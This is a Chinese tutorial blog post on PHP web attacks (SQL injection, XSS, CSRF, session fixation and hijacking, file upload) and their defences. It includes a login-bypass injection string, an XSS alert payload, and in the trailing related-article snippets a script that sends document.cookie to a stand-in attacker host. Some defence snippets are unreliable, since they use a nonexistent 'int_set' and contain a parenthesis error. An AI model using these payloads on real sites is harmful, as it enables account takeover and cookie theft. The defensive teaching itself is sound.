PHP安全之Web攻击

一、SQL注入攻击(SQL Injection)

攻击者把SQL命令插入到Web表单的输入域或页面请求的字符串,欺骗服务器执行恶意的SQL命令。在某些表单中,用户输入的内容直接用来构造(或者影响)动态SQL命令,或作为存储过程的输入参数,这类表单特别容易受到SQL注入式攻击。常见的SQL注入式攻击过程类如: 1.某个Web应用有一个登录页面,这个登录页面控制着用户是否有权访问应用,它要求用户输入一个名称和密码; 2.登录页面中输入的内容将直接用来构造动态的SQL命令,或者直接用作存储过程的参数; 例如:

$query = ‘SELECT * from Users WHERE login = ‘ . $username . ‘ AND password = ‘ . $password;

3.攻击者在用户名字和密码输入框中输入‘或‘1‘=‘1之类的内容; 4.用户输入的内容提交给服务器之后,服务器运行上面的代码构造出查询用户的SQL命令,但由于攻击者输入的内容非常特殊,所以最后得到的SQL命令变成:

SELECT * from Users WHERE login = ‘‘ or ‘1‘=‘1‘ AND password = ‘‘ or ‘1‘=‘1‘;

5.服务器执行查询或存储过程,将用户输入的身份信息和服务器中保存的身份信息进行对比; 6.由于SQL命令实际上已被注入式攻击修改,已经不能真正验证用户身份,所以系统会错误地授权给攻击者。 如果攻击者知道应用会将表单中输入的内容直接用于验证身份的查询,他就会尝试输入某些特殊的SQL字符串篡改查询改变其原来的功能,欺骗系统授予访问权限。 系统环境不同,攻击者可能造成的损害也不同,这主要由应用访问数据库的安全权限决定。如果用户的帐户具有管理员或其他比较高级的权限,攻击者就可能对数据库的表执行各种他想要做的操作,包括添加、删除或更新数据,甚至可能直接删除表 防范方法: 1.检查变量数据类型和格式 2.过滤特殊符号 3.绑定变量,使用预编译语句

二、跨网站脚本攻击(Cross Site Scripting, XSS)

攻击者将恶意代码注入到网页上,其他用户在加载网页时就会执行代码,攻击者可能得到包括但不限于更高的权限(如执行一些操作)、私密网页内容、会话和cookie等各种内容。这些恶意代码通常是JavaScript、HTML以及其他客户端脚本语言。 例如:

<?php
echo "欢迎您,".$_GET[‘name‘];

如果传入一段脚本<script>[code]</script>,那么脚本也会执行。用这样的URL将会执行JavaScript的alert函数弹出一个对话框:http://localhost/test.php?name=<script>alert(123456)</script> 常用的攻击手段有: 盗用cookie,获取敏感信息; 利用iframe、frame、XMLHttpRequest或上述Flash等方式,以(被攻击)用户的身份执行一些管理动作,或执行一些一般的如发微博、加好友、发私信等操作; 利用可被攻击的域受到其他域信任的特点,以受信任来源的身份请求一些平时不允许的操作,如进行不当的投票活动; 在访问量极大的一些页面上的XSS可以攻击一些小型网站,实现DDoS攻击的效果。 防范方法:使用htmlspecialchars函数将特殊字符转换成HTML编码,过滤输出的变量

三、跨网站请求伪造攻击(Cross Site Request Forgeries, CSRF)

攻击者伪造目标用户的HTTP请求,然后此请求发送到有CSRF漏洞的网站,网站执行此请求后,引发跨站请求伪造攻击。攻击者利用隐蔽的HTTP连接,让目标用户在不注意的情况下单击这个链接,由于是用户自己点击的,而他又是合法用户拥有合法权限,所以目标用户能够在网站内执行特定的HTTP链接,从而达到攻击者的目的。 它与XSS的攻击方法不同,XSS利用漏洞影响站点内的用户,攻击目标是同一站点内的用户者,而CSRF 通过伪装成受害用户发送恶意请求来影响Web系统中受害用户的利益。 例如: 某个购物网站购买商品时,采用http://www.shop.com/buy.php?item=watch&num=100,item参数确定要购买什么物品,num参数确定要购买数量,如果攻击者以隐藏的方式发送给目标用户链接 ,那么如果目标用户不小心访问以后,购买的数量就成了100个 防范方法: 1、检查网页的来源 2、检查内置的隐藏变量 3、使用POST,不要使用GET,处理变量也不要直接使用$_REQUEST

四、Session固定攻击(Session Fixation)

这种攻击方式的核心要点就是让合法用户使用攻击者预先设定的session id来访问被攻击的应用程序,一旦用户的会话ID被成功固定,攻击者就可以通过此session id来冒充用户访问应用程序。 例如: 1.攻击者访问网站http:///www.bank.com,获取他自己的session id,如:SID=123; 2.攻击者给目标用户发送链接,并带上自己的session id,如:http:///www.bank.com/?SID=123; 3.目标用户点击了http:///www.bank.com/?SID=123,像往常一样,输入自己的用户名、密码登录到网站; 4.由于服务器的session id不改变,现在攻击者点击http:///www.bank.com/?SID=123,他就拥有了目标用户的身份,可以为所欲为了。 防范方法: 1.定期更改session id

session_regenerate_id(TRUE);//删除旧的session文件,每次都会产生一个新的session id。默认false,保留旧的session

2.更改session的名称 session的默认名称是PHPSESSID,此变量会保存在cookie中,如果攻击者不抓包分析,就不能猜到这个名称,阻挡部分攻击

session_name("mysessionid");

3.关闭透明化session id 透明化session id指当浏览器中的http请求没有使用cookie来制定session id时,sessioin id使用链接来传递

int_set("session.use_trans_sid", 0);

4.只从cookie检查session id

int_set("session.use_cookies", 1);//表示使用cookies存放session id
int_set("session.use_only_cookies", 1);//表示只使用cookies存放session id

5.使用URL传递隐藏参数

$sid = md5(uniqid(rand()), TRUE));
$_SESSION["sid"] = $sid;//攻击者虽然能获取session数据,但是无法得知$sid的值,只要检查sid的值,就可以确认当前页面是否是web程序自己调用的

五、Session劫持攻击(Session Hijacking)

会话劫持是指攻击者利用各种手段来获取目标用户的session id。一旦获取到session id,那么攻击者可以利用目标用户的身份来登录网站,获取目标用户的操作权限。 攻击者获取目标用户session id的方法: 1.暴力破解:尝试各种session id,直到破解为止; 2.计算:如果session id使用非随机的方式产生,那么就有可能计算出来; 3.窃取:使用网络截获,xss攻击等方法获得 防范方法: 1.定期更改session id 2.更改session的名称 3.关闭透明化session id 4.设置HttpOnly。通过设置Cookie的HttpOnly为true,可以防止客户端脚本访问这个Cookie,从而有效的防止XSS攻击。

六、文件上传漏洞攻击(File Upload Attack)

文件上传漏洞指攻击者利用程序缺陷绕过系统对文件的验证与处理策略将恶意代码上传到服务器并获得执行服务器端命令的能力。 常用的攻击手段有: 上传Web脚本代码,Web容器解释执行上传的恶意脚本; 上传Flash跨域策略文件crossdomain.xml,修改访问权限(其他策略文件利用方式类似); 上传病毒、木马文件,诱骗用户和管理员下载执行; 上传包含脚本的图片,某些浏览器的低级版本会执行该脚本,用于钓鱼和欺诈。 总的来说,利用的上传文件要么具备可执行能力(恶意代码),要么具备影响服务器行为的能力(配置文件)。 防范方法: 1.文件上传的目录设置为不可执行; 2.判断文件类型,设置白名单。对于图片的处理,可以使用压缩函数或者resize函数,在处理图片的同时破坏图片中可能包含的HTML代码; 3.使用随机数改写文件名和文件路径:一个是上传后无法访问;再来就是像shell.php.rar.rar和crossdomain.xml这种文件,都将因为重命名而无法攻击; 4.单独设置文件服务器的域名:由于浏览器同源策略的关系,一系列客户端攻击将失效,比如上传crossdomain.xml、上传包含Javascript的XSS利用等问题将得到解决。
参考资料: http://os.51cto.com/art/201204/328938.htm https://www.zhihu.com/question/22953267 http://wt7315.blog.51cto.com/10319657/1865580 http://www.plhwin.com/2014/06/13/web-security-sql/

时间: 2024-10-19 00:03:13

PHP安全之Web攻击的相关文章

总结几种常见web攻击手段及其防御方式

本文简单介绍几种常见的攻击手段及其防御方式 XSS(跨站脚本攻击) CSRF(跨站请求伪造) SQL注入 DDOS web安全系列目录 总结几种常见web攻击手段极其防御方式 总结几种常见的安全算法 XSS 概念 全称是跨站脚本攻击(Cross Site Scripting),指攻击者在网页中嵌入恶意脚本程序. 案列 比如说我写了一个博客网站,然后攻击者在上面发布了一个文章,内容是这样的 <script>window.open("www.gongji.com?param="

总结几种常见web攻击手段极其防御方式

本文简单介绍几种常见的攻击手段及其防御方式 XSS(跨站脚本攻击) CSRF(跨站请求伪造) SQL注入 总结几种常见web攻击手段极其防御方式 XSS 概念 全称是跨站脚本攻击(Cross Site Scripting),指攻击者在网页中嵌入恶意脚本程序. 案列 比如说我写了一个博客网站,然后攻击者在上面发布了一个文章,内容是这样的 <script>window.open("www.gongji.com?param="+document.cookie)</scrip

web攻击

web攻击: 用巧妙的方法操纵URI URI : URL描述了访问位于服务器(authority)上的资源(path)或应用程序(query)所采用的协议(scheme).对于web应用程序来说,协议基本上都是HTTP,或者是HTTP的安全版本HTTPS.在HTTPS中,会话数据被SSL或TLS协议保护. 服务器 是运行HTTP软件的一台或多台计算机,通常用DNS名指定: 路径  描述了应用程序文件所处的文件夹或目录层次: 查询 包含了提交给服务器上的可执行程序的参数.URL中问号(?)右方所有

利用 ASP.NET 的内置功能抵御 Web 攻击 (1)

摘要: Dino 总结了最常见的 Web 攻击类型,并介绍了 Web 开发人员可以如何使用 ASP.NET 的内置功能来改进安全性. 一.ASP.NET 开发人员应当始终坚持的做法 如果您正在阅读本文,可能就不需要再向您灌输 Web 应用程序中的安全性愈来愈重要这一事实了.您需要的可能是一些有关如何在 ASP.NET 应用程序中实现安全性的实际建议.坏消息是,没有任何开发平台 — 包括 ASP.NET在内 — 能够保证一旦采用了该平台,您就能够编写百分百安全的代码.谁要是这么说,一准在撒谎.好消

【系统安全性】二、Web攻击与防范

二.Web攻击与防范 1.XSS攻击 跨站脚本攻击(Cross Site Scripting),因为简写CSS,与层叠样式表(Cascading Style Sheets)有歧义,所以取名XSS 原理:在网页中嵌入恶意脚本程序,在客户端浏览器执行(如用户输入数据转换成代码执行) 防范:输入数据HTML转义处理(主流框架默认支持) 2.注入攻击 原理:SQL伪装成HTTP请求参数 例如一个登录操作,输入帐号密码 假设后台的Sql是这样拼装的:Select * from user where use

web攻击模式

针对web攻击模式有2种 主动攻击 被动攻击 主动攻击:攻击者直接访问web应用,把攻击代码传入的攻击模式.代表的有SQL注入攻击和OS命令注入攻击 被动攻击:被动攻击(passive attack)是指利用圈套策略执行攻击代码的攻击模式.在被动攻击过程中,攻击者不直接对目标 Web 应用访问发起攻击.被动攻击通常的攻击模式如下所示.步骤 1: 攻击者诱使用户触发已设置好的陷阱,而陷阱会启动发送已嵌入攻击代码的 HTTP 请求.步骤 2: 当用户不知不觉中招之后,用户的浏览器或邮件客户端就会触发

web前端安全——常见的web攻击方法

面试题:你所了解的web攻击? 1.xss攻击 2.CSRF攻击 3.网络劫持攻击 4.控制台注入代码 5.钓鱼 6.DDoS攻击 7.SQL注入攻击 8.点击劫持 一.xss攻击 XSS攻击:跨站脚本攻击(Cross-Site Scripting),攻击目标是为了盗取存储在客户端的cookie或者其他网站用于识别客户端身份的敏感信息.一旦获取到合法用户的信息后,攻击者甚至可以假冒合法用户与网站进行交互. 防御方法:过滤特殊字符,HttpOnly 浏览器禁止页面的JS访问带有HttpOnly属性

前端学HTTP之web攻击技术

前面的话 简单的HTTP协议本身并不存在安全性问题,因此协议本身几乎不会成为攻击的对象.应用HTTP协议的服务器和客户端,以及运行在服务器上的Web应用等资源才是攻击目标.本文将详细介绍攻击web站点的手段 总括 与最初的设计相比,现今的Web网站应用的HTTP协议的使用方式已发生了翻天覆地的变化.几乎现今所有的Web网站都会使用会话(session)管理.加密处理等安全性方面的功能,而HTTP协议内并不具备这些功能 从整体上看,HTTP就是一个通用的单纯协议机制.因此它具备较多优势,但是在安全

使用HTTP Headers防御WEB攻击

简介 在用户会话中Cookies是一个十分重要的东西,一个身份验证的Cookies就相当于是密码.保卫这些身份验证的Cookies是一个十分重要的话题.在本文中,我们将演示如何在PHP应用中执行某些Cookies属性从而在某些攻击中保护我们的Cookies. 使用HTTP Header保护Cookies 这是一个已知的事实,跨站脚本攻击是一个十分危险的漏洞,其能够让攻击者从用户浏览器窃取到Cookies.HttpOnly的引进能够禁用外部JavaScript脚本读取Cookies.即使应用程序本